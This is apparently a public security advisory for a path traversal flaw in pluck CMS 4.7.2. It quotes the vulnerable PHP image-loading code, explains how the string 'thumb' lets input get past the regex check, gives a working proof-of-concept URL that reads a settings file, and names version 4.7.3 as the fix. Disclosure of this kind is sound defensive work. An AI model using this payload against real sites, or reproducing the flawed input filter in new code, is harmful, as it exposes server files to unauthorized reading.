# Exploit Title: pluck CMS 4.7.2 Path Traversal
# Date: 21-05-2015
# Software Link: http://www.pluck-cms.org/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps

1. Description

When we use word `thumb` at the begining of `$_GET['image']` it's possible to omit `preg_match()` function.

File: data/modules/albums/albums_getimage.php

$image = $_GET['image'];

//Then, check for hacking attempts (Remote Code Execution), and block them.
if (strpos($image, 'thumb') === false) {
  if (preg_match('#([.*])([/])([A-Za-z0-9.]{0,11})#', $image, $matches)) {
    if ($image != $matches[0]) {
      unset($image);
      die('A hacking attempt has been detected.');
    }
  }
}

elseif (strpos($image, 'thumb') !== false) {
  if (preg_match('#([.*])([/])thumb([/])([A-Za-z0-9.]{0,11})#', $image, $matches)) {
    if ($image != $matches[0]) {
      unset($image);
      die('A hacking attempt has been detected.');
    }
  }
}

//...if no hacking attempts found:
//Check if file exists.
if (file_exists('../../settings/modules/albums/'.$image)) {
  //Generate the image, make sure it doesn't end up in the visitors buffer.
  header('Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0');
  header('Expires: Thu, 19 Nov 1981 08:52:00 GMT');
  header('Pragma: no-cache');
  header('Content-Type: image/jpeg');
  echo readfile('../../settings/modules/albums/'.$image);
}

//If image doesn't exist, send 404 header.
else
  header('HTTP/1.0 404 Not Found');

http://security.szurek.pl/pluck-cms-472-path-traversal.html

2. Proof of Concept

http://pluck-url/data/modules/albums/albums_getimage.php?image=thumb/../../../../settings/langpref.php
  
3. Solution:
  
Update to version 4.7.3
https://github.com/pluck-cms/pluck/archive/4.7.3.zip